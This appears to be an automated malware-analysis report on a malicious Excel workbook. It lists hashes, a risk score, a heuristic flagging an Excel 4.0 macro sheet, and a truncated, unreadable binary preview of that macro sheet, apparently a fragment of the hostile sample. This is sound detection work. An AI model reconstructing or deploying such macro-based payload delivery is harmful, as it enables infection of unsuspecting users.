Office (OOXML) / .XLSX malware analysis — malicious · 7c28a53014ef117f

MALICIOUS

Office (OOXML) / .XLSX

136.3 KB Created: 2021-08-16 09:36:27 UTC Authoring application: Microsoft Excel 12.0000

MD5: 8bc9640aa0ffc83696e2ca65a119fcae SHA-1: b867c13199e407a427e4d58e6ea20b2d56e754ae SHA-256: 7c28a53014ef117f97f8cf374d31dd68196ab32a664e0c50f6e2fc59e1eda678

60 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is an Excel spreadsheet containing Excel 4.0 macros, which is a known technique for executing malicious code. The macros are likely used to download and execute a second-stage payload, although the specific commands are truncated in the provided evidence. This points to a macro-based malware delivery mechanism.

Heuristics 1

Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.bin
032d47664b7d14715eea5f41be6b7b4dfbd5d47b7bee84145ec9cd83f9230ac4 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 624412 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.bin` `032d47664b7d14715eea5f41be6b7b4dfbd5d47b7bee84145ec9cd83f9230ac4`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.bin	624412 bytes
Preview script First 1,000 lines of the extracted script � � � @ �� < � � � @ d � $ � � � �� , � , , � , = * : @ @ � B � @ B � � , N@ � , �@@ � , Q@ � , �S@ � , �P@ � , U@ � , @V@ � , T@ � , @Q@ � , @@ � , Z@ � , ]@ � , @[@ � , [@ � , O@ � , @ � , $@ � , N@ � , Z@ � , ]@ � , @[@ � , [@ � , O@ � , @ � , $@ � , N@ � , Z@ � , @Y@ � , @X@ � , Y@ � , O@ � , @ � , $@ � , N@ � , R@ � , U@ � , @P@ � , M@ � , @P@ � , T@ � , T@ � , S@ � , @R@ � , �P@ � , @P@ � , U@ � , @R@ � , �S@ � , �S@ � , @@ � , @R@ � , E 2 K C M W k d z v Q k r y %� < � � @ B � Q@ � , �N@ � , A@ � , �P@ � , �T@ � , A@ � , @ � , $@ � , @P@ � , T@ � , T@ � , S@ � , @R@ � , �P@ � , @P@ � , U@ � , @R@ � , �S@ � , �S@ � , �S@ � , @P@ � , @S@ � , @Q@ � , �N@ � , A@ � , U@ � , @Y@ � , �\@ � , ]@ � , A@ � , *@ � , $@ � , �U@ � , @R@ � , �S@ � , Q@ � , �S@ � , �U@ � , �T@ � , U@ � ... (truncated)

Preview script

First 1,000 lines of the extracted script

�  �  �   @      ��������    �       <          �  �  �             @   d           � $                                    �  �  �  ����  ,     �            ,                          ,                  �       ,                
=           *   :         @      @   � B �  @         B �       �       ,                            N@  �       ,                           �@@  �       ,                            Q@  �       ,                           �S@  �       ,                           �P@  �       ,                            U@  �       ,                           @V@  �       ,                            T@  �       ,                           @Q@  �       ,                            @@  �       ,                            Z@  �       ,                            ]@  �       ,                           @[@  �       ,                            [@  �       ,                            O@  �       ,                            *@  �       ,                            $@  �       ,                            N@  �       ,                            Z@  �       ,                            ]@  �       ,                           @[@  �       ,                            [@  �       ,                            O@  �       ,                            *@  �       ,                            $@  �       ,                            N@  �       ,                            Z@  �       ,                           @Y@  �       ,                           @X@  �       ,                            Y@  �       ,                            O@  �       ,                            *@  �       ,                            $@  �       ,                            N@  �       ,                            R@  �       ,                            U@  �       ,                           @P@  �       ,                            M@  �       ,                           @P@  �       ,                            T@  �       ,                            T@  �       ,                            S@  �       ,                           @R@  �       ,                           �P@  �       ,                           @P@  �       ,                            U@  �       ,                           @R@  �       ,                           �S@  �       ,                           �S@  �       ,                            @@  �       ,                           @R@  �       ,                
E           2      K C M W k d z v Q k r y %�    <   � � @    B �                 Q@  �       ,                           �N@  �       ,                            A@  �       ,                           �P@  �       ,                           �T@  �       ,                            A@  �       ,                            *@  �       ,                            $@  �       ,                           @P@  �       ,                            T@  �       ,                            T@  �       ,                            S@  �       ,                           @R@  �       ,                           �P@  �       ,                           @P@  �       ,                            U@  �       ,                           @R@  �       ,                           �S@  �       ,                           �S@  �       ,                           �S@  �       ,                           @P@  �       ,                           @S@  �       ,                           @Q@  �       ,                           �N@  �       ,                            A@  �       ,                            U@  �       ,                           @Y@  �       ,                           �\@  �       ,                            ]@  �       ,                            A@  �       ,                            *@  �       ,                            $@  �       ,                           �U@  �       ,                           @R@  �       ,                           �S@  �       ,                            Q@  �       ,                           �S@  �       ,                           �U@  �       ,                           �T@  �       ,                            U@  �
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.